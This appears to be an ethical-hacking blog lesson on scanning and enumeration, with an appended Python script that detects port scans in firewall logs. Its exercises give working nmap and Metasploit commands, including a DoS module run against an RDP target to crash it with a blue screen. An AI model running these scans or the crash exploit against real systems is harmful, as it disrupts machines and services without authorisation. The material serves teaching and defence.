Warning:
The objective of this blog is to learn about finding system vulnerabilities and security issues. Never try any method of hacking against any other IP address of any site, government website or server, etc., because that falls under cyber crime.
For educational purposes you can choose your friends'/lab IP address.
If anybody uses this blog for malicious purposes, I am not responsible. It will fall under cyber crime.
Scanning and Enumeration - Second Step of Ethical Hacking.
After completing the first step of ethical hacking, Information Gathering, we will perform step 2.
Scanning:
Scanning is a common technique used by a penetration tester to find out the open doors,
Enumeration:
Enumeration is the first attack on the target network. It is the process of gathering information about a target machine by actively connecting to it.
Q:1 Which information can be found by scanning?
Q:2 What is an open port, a null session, reverse_tcp?
Q:3 Study the nmap and Metasploit tools in Kali Linux.
Q:4 Understand the following terms:
1. Vulnerability
2. Exploit
3. Payload
Q:5 Exercise
Ping the target machine to check whether it is live.
1. Find the open ports of the target machine.
$ nmap -T4 -A -v Targetpcip
(Check whether port 445 is open.)
2. Gather operating system information of the target machine.
Go to --> Terminal
Type
$ msfconsole
msf> use auxiliary/scanner/portscan/syn
> set RHOSTS targetmachineip
> set PORTS 445
> run
if you succeed then
Note: TCP port 445 is used for SMB over TCP. The SMB (Server Message Block) protocol is used, among other things, for file sharing in Windows.
Again go to Terminal --> your home dir
- Find the operating system type and version
- Windows has more vulnerabilities
$ msfconsole
msf> use auxiliary/scanner/smb/smb_version
> set RHOSTS Targetmachineip
> run
3. You have found the target machine's OS version. Now find its vulnerability and perform the attack.
$ msfconsole
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
> show options
> set RHOST targetip
> exploit
Check target PC. (Blue screen error)
4. What are the countermeasures for this attack?
5. Demonstrate any two other vulnerabilities of Windows or Linux.
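
Added example (not part of the original blog): the nmap scan in step 1 and the SYN scan in step 2 leave a trail of TCP SYN packets in the lab target's firewall log, and this Python script shows how a defender can flag that pattern. The log lines, addresses, thresholds and function names are constructed for illustration; only the SRC/DST/DPT field names follow the iptables LOG layout.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Field names follow the iptables LOG layout; the ISO timestamp prefix and
# every address below are constructed for this example (not real traffic).
SAMPLE = [
    f"2024-01-01T10:00:0{i} fw kernel: IN=eth0 OUT= SRC=192.168.56.20 "
    f"DST=192.168.56.10 LEN=44 PROTO=TCP SPT=4{i}000 DPT={p} WINDOW=1024 SYN URGP=0"
    for i, p in enumerate([21, 22, 80, 135, 139, 445, 3389])   # scanner
] + [
    "2024-01-01T10:00:03 fw kernel: IN=eth0 OUT= SRC=192.168.56.30 "
    "DST=192.168.56.10 LEN=52 PROTO=TCP SPT=50122 DPT=445 WINDOW=8192 SYN URGP=0",
]                                                              # normal SMB client
LINE = re.compile(r"^(?P<ts>\S+) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
                  r".*?PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?\bSYN\b")
WATCHED = {445: "SMB", 3389: "RDP"}   # the two services this exercise touches


def parse(lines):
    """Yield (timestamp, src, dst, dport) for every logged TCP SYN."""
    for line in lines:
        m = LINE.search(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dpt"])


def detect(lines, window=timedelta(seconds=10), min_ports=5):
    """Report sources that hit >= min_ports distinct ports on one host in window."""
    hits = defaultdict(list)                       # (src, dst) -> [(ts, dport)]
    found = defaultdict(lambda: {"scanned": set(), "watched": set()})
    for ts, src, dst, dpt in parse(lines):
        hits[(src, dst)].append((ts, dpt))
        if dpt in WATCHED:
            found[src]["watched"].add(WATCHED[dpt])
    for (src, dst), seen in hits.items():
        seen.sort()
        start = 0
        for end in range(len(seen)):               # sliding time window
            while seen[end][0] - seen[start][0] > window:
                start += 1
            if len({port for _, port in seen[start:end + 1]}) >= min_ports:
                found[src]["scanned"].add(dst)
                break
    # A lone SYN to 445 is ordinary file sharing, so only scanners are returned.
    return {src: info for src, info in found.items() if info["scanned"]}


if __name__ == "__main__":
    for src, info in detect(SAMPLE).items():
        print(src, "scanned", sorted(info["scanned"]), "probed", sorted(info["watched"]))
```

A scan spread out over minutes falls below the default 10-second window, so widen `window` or lower `min_ports` when tuning against slower scans.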